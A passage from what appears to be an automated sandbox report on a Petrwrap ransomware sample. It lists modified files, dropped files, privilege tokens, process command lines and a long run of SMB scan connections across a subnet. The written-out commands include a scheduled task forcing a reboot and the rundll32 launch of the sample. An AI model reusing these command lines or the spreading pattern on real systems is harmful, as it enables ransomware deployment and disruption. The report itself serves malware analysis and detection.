| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OOFTMPL.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SHARING.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POST.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RSSITEM.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\SettingsInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RESEND.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECURE.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Explorer.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfo.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLPERF.H | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\INFOMAIL.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESN.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMIMEE.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\ACTIVITY.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SIGN.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESP.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKDEC.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKUPD.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Internet Explorer\en-US\eula.rtf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFRES.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POSTIT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\jawt.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RCLRPT.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMIMES.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\CGMIMP32.CFG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AboutBox.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\ResourceInternal.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SplashScreen.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\027cc450ef5f8c5f653329641ec1fed9 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\dllhost.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\202E.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\202E.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\202E.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\202E.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\202E.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\202E.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\027cc450ef5f8c5f653329641ec1fed9.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\027cc450ef5f8c5f653329641ec1fed9.dll,#1
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03
C:\Users\Admin\AppData\Local\Temp\202E.tmp
"C:\Users\Admin\AppData\Local\Temp\202E.tmp" \\.\pipe\{4A5FD4FC-5F3C-4E90-A8BC-D1C788D247F5}
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 02:03
Network
| Country | Destination | Domain | Proto |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.0:139 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.2:139 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.3:139 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.4:139 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.5:139 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.6:139 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.7:139 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.8:139 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.9:139 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.10:139 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.11:139 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.12:139 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.13:139 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.14:139 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.15:139 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.16:139 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.17:139 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.18:139 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.19:139 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.20:139 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.21:139 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.22:139 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.23:139 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.24:139 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.25:139 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.26:139 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.27:139 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.28:139 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.29:139 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.30:139 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.31:139 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.32:139 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.33:139 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.34:139 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.35:139 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.36:139 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.37:139 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.38:139 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.39:139 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.40:139 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.41:139 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.42:139 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.43:139 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.44:139 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.45:139 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.46:139 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.47:139 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.48:139 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.49:139 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.50:139 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.51:139 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.52:139 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.53:139 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.54:139 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.55:139 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.56:139 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.57:139 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.58:139 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.59:139 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.60:139 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.61:139 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.62:139 | tcp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.63:139 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.64:139 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.65:139 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.66:139 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.67:139 | tcp | |
| N/A | 10.127.0.68:445 | tcp | |
| N/A | 10.127.0.68:139 | tcp | |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.69:139 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.70:139 | tcp | |
| N/A | 10.127.0.71:445 | tcp | |
| N/A | 10.127.0.71:139 | tcp | |
| N/A | 10.127.0.72:445 | tcp | |
| N/A | 10.127.0.72:139 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.73:139 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| N/A | 10.127.0.74:139 | tcp | |
| N/A | 10.127.0.75:445 | tcp | |
| N/A | 10.127.0.75:139 | tcp | |
| N/A | 10.127.0.76:445 | tcp | |
| N/A | 10.127.0.76:139 | tcp | |
| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.77:139 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.78:139 | tcp | |
| N/A | 10.127.0.79:445 | tcp | |
| N/A | 10.127.0.79:139 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| N/A | 10.127.0.80:139 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| N/A | 10.127.0.81:139 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| N/A | 10.127.0.82:139 | tcp | |
| N/A | 10.127.0.83:445 | tcp | |
| N/A | 10.127.0.83:139 | tcp | |
| N/A | 10.127.0.84:445 | tcp | |
| N/A | 10.127.0.84:139 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.85:139 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.86:139 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| N/A | 10.127.0.87:139 | tcp | |
| N/A | 10.127.0.88:445 | tcp | |
| N/A | 10.127.0.88:139 | tcp | |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.89:139 | tcp | |
| N/A | 10.127.0.90:445 | tcp | |
| N/A | 10.127.0.90:139 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.91:139 | tcp | |
| N/A | 10.127.0.92:445 | tcp | |
| N/A | 10.127.0.92:139 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.93:139 | tcp | |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.94:139 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| N/A | 10.127.0.95:139 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.96:139 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| N/A | 10.127.0.97:139 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.98:139 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.99:139 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.100:139 | tcp | |
| N/A | 10.127.0.101:445 | tcp | |
| N/A | 10.127.0.101:139 | tcp | |
| N/A | 10.127.0.102:445 | tcp | |
| N/A | 10.127.0.102:139 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.103:139 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.104:139 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.105:139 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| N/A | 10.127.0.106:139 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.107:139 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| N/A | 10.127.0.108:139 | tcp | |
| N/A | 10.127.0.109:445 | tcp | |
| N/A | 10.127.0.109:139 | tcp | |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.110:139 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| N/A | 10.127.0.111:139 | tcp | |
| N/A | 10.127.0.112:445 | tcp | |
| N/A | 10.127.0.112:139 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| N/A | 10.127.0.113:139 | tcp | |
| N/A | 10.127.0.114:445 | tcp | |
| N/A | 10.127.0.114:139 | tcp | |
| N/A | 10.127.0.115:445 | tcp | |
| N/A | 10.127.0.115:139 | tcp | |
| N/A | 10.127.0.116:445 | tcp | |
| N/A | 10.127.0.116:139 | tcp | |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.117:139 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.118:139 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.119:139 | tcp | |
| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.120:139 | tcp | |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.121:139 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.122:139 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.123:139 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.124:139 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.125:139 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.126:139 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.0.127:139 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| N/A | 10.127.0.128:139 | tcp | |
| N/A | 10.127.0.129:445 | tcp | |
| N/A | 10.127.0.129:139 | tcp | |
| N/A | 10.127.0.130:445 | tcp | |
| N/A | 10.127.0.130:139 | tcp | |
| N/A | 10.127.0.131:445 | tcp | |
| N/A | 10.127.0.131:139 | tcp | |
| N/A | 10.127.0.132:445 | tcp | |
| N/A | 10.127.0.132:139 | tcp | |
| N/A | 10.127.0.133:445 | tcp | |
| N/A | 10.127.0.133:139 | tcp | |
| N/A | 10.127.0.134:445 | tcp | |
| N/A | 10.127.0.134:139 | tcp | |
| N/A | 10.127.0.135:445 | tcp | |
| N/A | 10.127.0.135:139 | tcp | |
| N/A | 10.127.0.136:445 | tcp | |
| N/A | 10.127.0.136:139 | tcp | |
| N/A | 10.127.0.137:445 | tcp | |
| N/A | 10.127.0.137:139 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.138:139 | tcp | |
| N/A | 10.127.0.139:445 | tcp | |
| N/A | 10.127.0.139:139 | tcp | |
| N/A | 10.127.0.140:445 | tcp | |
| N/A | 10.127.0.140:139 | tcp | |
| N/A | 10.127.0.141:445 | tcp | |
| N/A | 10.127.0.141:139 | tcp | |
| N/A | 10.127.0.142:445 | tcp | |
| N/A | 10.127.0.142:139 | tcp | |
| N/A | 10.127.0.143:445 | tcp | |
| N/A | 10.127.0.143:139 | tcp | |
| N/A | 10.127.0.144:445 | tcp | |
| N/A | 10.127.0.144:139 | tcp | |
| N/A | 10.127.0.145:445 | tcp | |
| N/A | 10.127.0.145:139 | tcp | |
| N/A | 10.127.0.146:445 | tcp | |
| N/A | 10.127.0.146:139 | tcp | |
| N/A | 10.127.0.147:445 | tcp | |
| N/A | 10.127.0.147:139 | tcp | |
| N/A | 10.127.0.148:445 | tcp | |
| N/A | 10.127.0.148:139 | tcp | |
| N/A | 10.127.0.149:445 | tcp | |
| N/A | 10.127.0.149:139 | tcp | |
| N/A | 10.127.0.150:445 | tcp | |
| N/A | 10.127.0.150:139 | tcp | |
| N/A | 10.127.0.151:445 | tcp | |
| N/A | 10.127.0.151:139 | tcp | |
| N/A | 10.127.0.152:445 | tcp | |
| N/A | 10.127.0.152:139 | tcp | |
| N/A | 10.127.0.153:445 | tcp | |
| N/A | 10.127.0.153:139 | tcp | |
| N/A | 10.127.0.154:445 | tcp | |
| N/A | 10.127.0.154:139 | tcp | |
| N/A | 10.127.0.155:445 | tcp | |
| N/A | 10.127.0.155:139 | tcp | |
| N/A | 10.127.0.156:445 | tcp | |
| N/A | 10.127.0.156:139 | tcp | |
| N/A | 10.127.0.157:445 | tcp | |
| N/A | 10.127.0.157:139 | tcp | |
| N/A | 10.127.0.158:445 | tcp | |
| N/A | 10.127.0.158:139 | tcp | |
| N/A | 10.127.0.159:445 | tcp | |
| N/A | 10.127.0.159:139 | tcp | |
| N/A | 10.127.0.160:445 | tcp | |
| N/A | 10.127.0.160:139 | tcp | |
| N/A | 10.127.0.161:445 | tcp | |
| N/A | 10.127.0.161:139 | tcp | |
| N/A | 10.127.0.162:445 | tcp | |
| N/A | 10.127.0.162:139 | tcp | |
| N/A | 10.127.0.163:445 | tcp | |
| N/A | 10.127.0.163:139 | tcp | |
| N/A | 10.127.0.164:445 | tcp | |
| N/A | 10.127.0.164:139 | tcp | |
| N/A | 10.127.0.165:445 | tcp | |
| N/A | 10.127.0.165:139 | tcp | |
| N/A | 10.127.0.166:445 | tcp | |
| N/A | 10.127.0.166:139 | tcp | |
| N/A | 10.127.0.167:445 | tcp | |
| N/A | 10.127.0.167:139 | tcp | |
| N/A | 10.127.0.168:445 | tcp | |
| N/A | 10.127.0.168:139 | tcp | |
| N/A | 10.127.0.169:445 | tcp | |
| N/A | 10.127.0.169:139 | tcp | |
| N/A | 10.127.0.170:445 | tcp | |
| N/A | 10.127.0.170:139 | tcp | |
| N/A | 10.127.0.171:445 | tcp | |
| N/A | 10.127.0.171:139 | tcp | |
| N/A | 10.127.0.172:445 | tcp | |
| N/A | 10.127.0.172:139 | tcp | |
| N/A | 10.127.0.173:445 | tcp | |
| N/A | 10.127.0.173:139 | tcp | |
| N/A | 10.127.0.174:445 | tcp | |
| N/A | 10.127.0.174:139 | tcp | |
| N/A | 10.127.0.175:445 | tcp | |
| N/A | 10.127.0.175:139 | tcp | |
| N/A | 10.127.0.176:445 | tcp | |
| N/A | 10.127.0.176:139 | tcp | |
| N/A | 10.127.0.177:445 | tcp | |
| N/A | 10.127.0.177:139 | tcp | |
| N/A | 10.127.0.178:445 | tcp | |
| N/A | 10.127.0.178:139 | tcp | |
| N/A | 10.127.0.179:445 | tcp | |
| N/A | 10.127.0.179:139 | tcp | |
| N/A | 10.127.0.180:445 | tcp | |
| N/A | 10.127.0.180:139 | tcp | |
| N/A | 10.127.0.181:445 | tcp | |
| N/A | 10.127.0.181:139 | tcp | |
| N/A | 10.127.0.182:445 | tcp | |
| N/A | 10.127.0.182:139 | tcp | |
| N/A | 10.127.0.183:445 | tcp | |
| N/A | 10.127.0.183:139 | tcp | |
| N/A | 10.127.0.184:445 | tcp | |
| N/A | 10.127.0.184:139 | tcp | |
| N/A | 10.127.0.185:445 | tcp | |
| N/A | 10.127.0.185:139 | tcp | |
| N/A | 10.127.0.186:445 | tcp | |
| N/A | 10.127.0.186:139 | tcp | |
| N/A | 10.127.0.187:445 | tcp | |
| N/A | 10.127.0.187:139 | tcp | |
| N/A | 10.127.0.188:445 | tcp | |
| N/A | 10.127.0.188:139 | tcp | |
| N/A | 10.127.0.189:445 | tcp | |
| N/A | 10.127.0.189:139 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| N/A | 10.127.0.190:139 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| N/A | 10.127.0.191:139 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| N/A | 10.127.0.192:139 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.0.193:139 | tcp | |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.0.194:139 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.195:139 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.196:139 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| N/A | 10.127.0.197:139 | tcp | |
